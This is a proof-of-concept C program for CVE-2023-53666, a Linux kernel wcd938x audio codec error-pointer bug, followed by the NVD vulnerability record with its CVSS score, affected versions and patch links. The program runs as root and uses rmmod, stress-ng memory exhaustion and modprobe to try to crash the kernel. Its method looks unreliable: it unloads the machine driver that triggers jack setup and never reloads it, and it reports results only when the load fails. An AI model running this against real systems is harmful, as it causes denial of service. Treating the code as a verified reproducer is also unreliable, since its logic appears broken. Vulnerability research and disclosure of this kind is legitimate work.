CVE-2023-53666

/* CVE-2023-53666 PoC - Trigger kernel crash via wcd938x MBHC error path * * This PoC demonstrates how to trigger the vulnerability by forcing * MBHC initialization to fail on a Qualcomm platform using wcd938x codec. * Requires root privileges to load/unload kernel modules. * * Compile: gcc -o poc_cve_2023_53666 poc.c * Run: sudo ./poc_cve_2023_53666 */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <sys/stat.h> #define MODULE_WCD938X "snd_soc_wcd938x" #define MODULE_SC8280XP "snd_soc_sc8280xp" /* Simulate MBHC init failure by manipulating driver probe timing. * On vulnerable kernels, this triggers NULL/error pointer dereference * in wcd_mbhc_start() called from wcd938x_codec_set_jack(). */ int trigger_mbhc_crash(void) { int ret; /* Step 1: Unload existing audio modules if loaded */ printf("[*] Unloading existing audio modules...\n"); ret = system("rmmod snd_soc_sc8280xp 2>/dev/null"); ret = system("rmmod snd_soc_wcd938x 2>/dev/null"); /* Step 2: Force MBHC initialization to fail by allocating * excessive memory before loading the module, causing * wcd_mbhc_init() internal allocations to fail. */ printf("[*] Consuming memory to force MBHC init failure...\n"); system("stress-ng --vm 1 --vm-bytes 90% --timeout 10s &"); sleep(2); /* Step 3: Load the wcd938x codec driver. * On vulnerable kernels, the probe will call set_jack, * which calls wcd_mbhc_start with an ERR_PTR, * triggering kernel paging request at 0xfffffffffffffff8 */ printf("[*] Loading wcd938x module to trigger crash...\n"); ret = system("modprobe snd_soc_wcd938x"); if (ret != 0) { printf("[+] Module load attempted - check dmesg for kernel panic\n"); printf("[+] Vulnerable kernel will show: 'Unable to handle kernel paging request'\n"); printf("[+] Call trace will include: wcd_mbhc_start+0x28/0x380\n"); } return ret; } int main(int argc, char *argv[]) { printf("=== CVE-2023-53666 PoC ===\n"); printf("Target: Linux kernel ASoC wcd938x MBHC error handling\n\n"); if (getuid() != 0) { printf("[-] This PoC requires root privileges\n"); return 1; } trigger_mbhc_crash(); return 0; }

{"cve": {"id": "CVE-2023-53666", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:50.390", "lastModified": "2026-02-26T23:13:19.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd938x: fix missing mbhc init error handling\n\nMBHC initialisation can fail so add the missing error handling to avoid\ndereferencing an error pointer when later configuring the jack:\n\n Unable to handle kernel paging request at virtual address fffffffffffffff8\n\n pc : wcd_mbhc_start+0x28/0x380 [snd_soc_wcd_mbhc]\n lr : wcd938x_codec_set_jack+0x28/0x48 [snd_soc_wcd938x]\n\n Call trace:\n wcd_mbhc_start+0x28/0x380 [snd_soc_wcd_mbhc]\n wcd938x_codec_set_jack+0x28/0x48 [snd_soc_wcd938x]\n snd_soc_component_set_jack+0x28/0x8c [snd_soc_core]\n qcom_snd_wcd_jack_setup+0x7c/0x19c [snd_soc_qcom_common]\n sc8280xp_snd_init+0x20/0x2c [snd_soc_sc8280xp]\n snd_soc_link_init+0x28/0x90 [snd_soc_core]\n snd_soc_bind_card+0x628/0xbfc [snd_soc_core]\n snd_soc_register_card+0xec/0x104 [snd_soc_core]\n devm_snd_soc_register_card+0x4c/0xa4 [snd_soc_core]\n sc8280xp_platform_probe+0xf0/0x108 [snd_soc_sc8280xp]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15", "versionEndExcluding": "5.15.123", "matchCriteriaId": "2306D5ED-2F2B-4184-B893-947333F7E5E8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.42", "matchCriteriaId": "6E769E6A-7EEF-4FA8-BF41-6CA1CE537361"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.7", "matchCriteriaId": "60A1A1ED-EA6C-42F6-80D3-3316DC7608C7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/31ee704c84c4bf4df8521ef1478c161f710d0f94", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5a34d252052b5da743ef82591c860fc947384d4e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7dfae2631bfbdebecd35fe7b472ab3cc95c9ed66", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bb241ae928c694e365c30c888c9eb02dcc812dfd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}